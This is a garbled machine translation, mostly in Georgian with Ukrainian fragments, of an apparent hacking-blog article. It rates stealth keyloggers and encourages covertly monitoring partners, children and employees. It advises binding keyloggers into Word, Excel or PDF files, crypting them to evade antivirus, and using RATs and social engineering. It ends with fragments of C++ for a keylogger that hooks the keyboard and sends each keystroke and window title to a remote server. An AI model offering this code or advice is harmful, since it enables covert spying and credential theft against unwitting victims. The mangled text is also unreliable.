ეს ასევე სახიფათო საქმეა. ფუნქციონალობა მთლიანად Elite keylogger-ზე. ღერძი zі skritnіstyu სწორი girsche. Winlogon-ის პაროლები აღარ იჭრება, win დრაივერი არ არის є, ისინი არ არის შეყვანილი ბირთვში. თუმცა, ის დაინსტალირებულია AppData დირექტორიას სისტემაში და დანართებში, რომელთა მიღწევა არც ისე ადვილია მესამე მხარის დრაივერებისთვის (არა ამ ინსტალაციების სახელით). დაიცავი ანტივირუსები ადრეული chino წარმატებით ძარცვა, ასე რომ ძარცვა Qiu rich არ არის საჭირო nadіynoy i bezpechnoy ერთად vikoristanny, მაგალითად, თქვენ უნდა იმუშაოთ ხელისუფლების მოვალეობაზე. ;) სხვა რამე წებო, ან დაშიფრეთ კოდი ანტივირუსებზე დასამაგრებლად, არ წახვიდეთ.

Pratsyuє OS Win-ის ნებისმიერ ვერსიაზე (რაც პრაქტიკულია).

უფრო მეტიც, ყველაფერი მშვენიერია: ყველაფრის ჩაწერა (პაროლების შექმნა Windows-ში შესასვლელად), ყველგან გადაცემა (ელ. ფოსტის, ftp-ის, ფიქსირებული ფლეშ დრაივის ჩათვლით). ზრუჩნისტისთვის ყველაფერი სასწაულია.

3. Spytech SpyAgent.

რეიტინგი (10-დან):

• დანართი: 4
• ეფექტურობა / გამოყენებადობა: 8
• ფუნქციონალობა: 10

ასე უპატივცემულო keylogger, თუნდაც ის საიდუმლო იყოს. ასევე შესაძლებელია OS-ის ვერსიების მხარდაჭერა. ფუნქციონირება წინა ვარიანტების მსგავსია. Іsnuє tsіkava ფუნქცია თვითგანადგურების გარკვეული პერიოდის შემდეგ (ან წინასწარ განსაზღვრული თარიღის მიღწევის შემდეგ).

გარდა ამისა, შესაძლებელია ვიდეოს ჩაწერა ვებკამერიდან და ხმის მიკროფონიდან, რომლის მოთხოვნაც შესაძლებელია და რომელიც მიუწვდომელია წინა ორი წარმომადგენლისგან.

Є რობოტული რეჟიმი, რომელიც მოსახერხებელია კომპიუტერების მთელ ქსელთან ტემპის შესანარჩუნებლად. ვინ, გამოსვლამდე, є StaffCop-ში (სანამ ირგვლივ მიმოიხედე, არა ჩართვები ზღვარზე ერთი კორისტუვაჩისთვის - ფიზიკური ინდივიდისთვის). შესაძლოა, ეს პროგრამა იდეალურია რობოტებისთვის, რათა მიჰყვნენ მათ spivrobitnik-ს (მინდა ლიდერი ამ სფეროში StaffCop-ისა და LanAgent-ის დაცვის გარეშე - მაგალითად, Vi - jur. Person, obov'yazkovo გაოცებული იყოს მათი ბიკით). მაგრამ იმისთვის, რომ თვალი ადევნოთ თქვენს შთამომავლობას, გიყვართ ჯდომა და მოზრდილების საიტების ყურება. ტობტო. იქ უფრო მეტად საჭიროა არა მიმაგრება, არამედ უფრო ეფექტური (მათ შორის ლამაზი ჟურნალების თაიგული-zvіtіv უბრალოდ) საიტების/პროგრამების ამოცანების დაბლოკვის ფუნქცია (SpyAgent-ს აქვს იგივე).

4. Spyrix პერსონალური მონიტორი.

რეიტინგი (10-დან):

• დანართი: 4
• ეფექტურობა / გამოყენებადობა: 6
• ფუნქციონალობა: 10

ფუნქციონირებს წინა კანდიდატის თანაბარზე, თუმცა არის მთლიანობის პრობლემები. გარდა ამისა, ფუნქციონირება მოიცავს cicava rich: ფაილების კოპირებას USB-მატარებლებისგან, რომლებიც ჩასმულია კომპიუტერში, ასევე ჟურნალების დისტანციურად გადახედვას ვებ-ანგარიშის მეშვეობით Spyrix-ის ვებსაიტზე).

5. Spyrix პერსონალური მონიტორი.

რეიტინგი (10-დან):

• დანართი: 3
• ეფექტურობა / გამოყენებადობა: 6
• ფუნქციონალობა: 8

მოხსენება არ არის აღწერილობა, tk. Keylogger-ის ამ ასლს არ შეუძლია ისეთი რამის გაკეთება, რაც არ იქნება ერთ-ერთ წინა spiger-ში, თუმცა, ზოგიერთი keylogger შეიძლება მოხვდეს სულში (ყოველ შემთხვევაში, საკუთარი ინტერფეისით).

რა შედეგი შეიძლება მოჰყვეს?

Keylogger-ის ელექტრომომარაგება უფრო ეთიკური, ნაკლებად ტექნიკური და უფრო მძიმედ გამოყენებული თქვენი მიზნებისთვის.

ანალოგიურად, თქვენ ხართ რობოტის მიმწოდებელი, რომელსაც უნდა აკონტროლოს თავისი spivrobitnikiv, თამამად დააყენოს StaffCop, აიღოს თქვენი spivrobitnikiv ასოები და დაუშვას ასეთი ქმედებები (და გარდა ამისა, ასეთი სამუშაოსთვის მათ შეუძლიათ საკმაოდ კარგად მოგიყვანონ) და პირდაპირ კონცხი. მინდა ვიცოდე ჩემი სპივრობიტნიკის პრაქტიკის გასაუმჯობესებლად განსაკუთრებით და ეფექტური გზები.

თუ თქვენ ხართ IT-fahivets-pochatkіvets, რომელსაც უბრალოდ გამოცდით, თუ არა - თქვენ სულელი ხართ - და თუ მუშაობთ მარჯვნივ, გამოიყენეთ სოციალური ინჟინერიის მეთოდები და ჩაატარეთ ტესტირება თქვენს მეგობრებზე, vikoristovuyuchi be-yaky z ინდუქცია. თუმცა დაიმახსოვრეთ: მსხვერპლთა მიერ ასეთი აქტივობის გამოვლინება მეგობრობასა და დღეგრძელობასაც კი არ აქცევს. ;) მე ნამდვილად არ ვამოწმებ თქვენს რობოტს. დაიმახსოვრე ჩემი სიტყვები: მე მივიღე. ;)

ისე, შენი მეტა შეყვარებულს, ადამიანს, მოსამართლეს, ან იქნებ, ბევრს შრომობ რეგულარულად და ერთი პენისთვის, კარგად დაფიქრდი, ჩი ვარტო. Adzhe ადრეული chi pizno შეგიძლიათ მიიღოთ იგი. ის ისეთი არაა: „სხვისი მოხეტიალე სითეთრეში შევარდნა - მიმღებებით უკმაყოფილო“. თუ თქვენ ჯერ კიდევ გჭირდებათ (ან იქნებ თქვენ მუშაობთ კომპიუტერის პრობლემების გამოძიების სფეროში და შეგიძლიათ შეიყვანოთ თქვენი პროფესიული ფეხსაცმელი), მაშინ მხოლოდ ორი ვარიანტია: ვირთხა! და Elite Keylogger. ინსტალაციის სადისტრიბუციო კომპლექტების მიმაგრების რეჟიმში, რომელიც გაერთიანებულია word/excel/pdf-ზე. მოკლედ, შეძლებისდაგვარად, კრიპტი ახალი კრიპტორით. მხოლოდ ყოველ მომენტში შეგიძლიათ გარანტირებული გქონდეთ მეტ-ნაკლებად უსაფრთხო აქტივობა და რეალური წარმატება.

მაგრამ ნებისმიერ შემთხვევაში, გახსოვდეთ, რომ უმჯობესია გამოიყენოთ keyloggers - მიზნის მიღწევაში მხოლოდ ერთი პატარა ხვრელია (მათ შორის, მარტივი შეტევები). არ მიიღოთ ადმინისტრაციული უფლებები, არ მიიღოთ ფიზიკური წვდომა და ყველა კორისტუვაჩი არ იქნება ღია, წაიკითხეთ და ჩამოტვირთეთ მეტი თქვენი დანართი/მოთხოვნა (პრივიტი სოციალური ინჟინერია), მაინც ნუ დაიწყებთ ანტივირუსის / თქვენი კლავიაჟერის / კრიპტორის ჩართვას . ყველა ამ და მრავალი სხვა პრობლემის გადალახვა შესაძლებელია, მაგრამ მეორე არის სხვა სტატიების მთელი სერიის თემა.

ერთი სიტყვით, მოწმეებმა ინფორმაციული უსაფრთხოების დასაკეცი, არაუსაფრთხო და კიდევ უფრო ციკავი სამყაროში პორინატი დაიწყეს. :)

Პატივისცემით,ლისიაკი ო.ს.

და პირველი რაც უნდა გააკეთოთ არის კითხვის დაწყება - შეამოწმეთ იგი ჩემს ბლოგში, სადაც ვაქვეყნებ ჩემი ავტორის სტატიებს პროგრამირების, ვირუსოლოგიისა და სხვა გამოსვლების შესახებ.
ორიგინალური სტატია

ყველა ინფორმაცია მოცემულია მხოლოდ თქვენი ცოდნისთვის. არც ადმინისტრაცია და არც ავტორი არ ეკისრება პასუხისმგებლობას ამ სტატიის მასალებით დამორჩილებულ შესაძლო ბოროტმოქმედებაზე.

• Visual Studio 2015 საზოგადოების განახლება 4
• ვიზუალური C++ 2015 წელი

• კონსოლის პროგრამა, ასე რომ თქვენ მიიღებთ მონაცემებს კლიენტისგან და იხილავთ მას კონსოლში

• Vlasne, თავად keylogger, რომელიც არის სერვერზე კლავიშების დაჭერის გზა

სერვერი
ჩვენ ვქმნით C++ კონსოლის პროგრამას Visual Studio-ში.
მთელი კოდი ოფისშია. MSDN კონდახი - * მიმოხილვისთვის ეწვიეთ ფორუმს. *
ჩვენთვის აუცილებელი არ არის მნიშვნელობის სიგელები ახალში ჩავანაცვლოთ.
მოდით ჩავწეროთ მუდმივი ცვლილებები: ბუფერის ზომა და სერვერის პორტი, რომელზეც იგზავნება ჟურნალები

Კოდი:

#define DEFAULT_BUFLEN 1024 //Buffer #define DEFAULT_PORT "1337" //პორტი

Კოდი:

გააკეთე (ClientSocket = მიღება (ListenSocket, NULL, NULL); //დაკავშირების მიღება iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//წაიკითხე ჟურნალი, თუ (iResult > 0) // ჟურნალი ცარიელი არ არის printf( "% s", recvbuf); //Display closesocket(ClientSocket);//დახურეთ თარიღის memsset(recvbuf, 0, sizeof recvbuf);//აღადგინეთ მეხსიერება) while (true);

კლიენტი

Კოდი:

#define DEFAULT_BUFLEN 20000 #define SERVER_IP "127.0.0.1" #define SERVER_PORT "1337"

Კოდი:

WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct; charlastwindow; int Save (int keystroke); // სხვა არგუმენტის აღება

Კოდი:

გაუქმებული გაგზავნის მონაცემები (char*ip, char*port, char*data)

Კოდი:

ჩარდატა; sprintf(მონაცემები, "\n\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, მონაცემები);

Კოდი:

ჩარკი; sprintf(c, "%c", key_stroke); sendData(SERVER_IP, SERVER_PORT, c);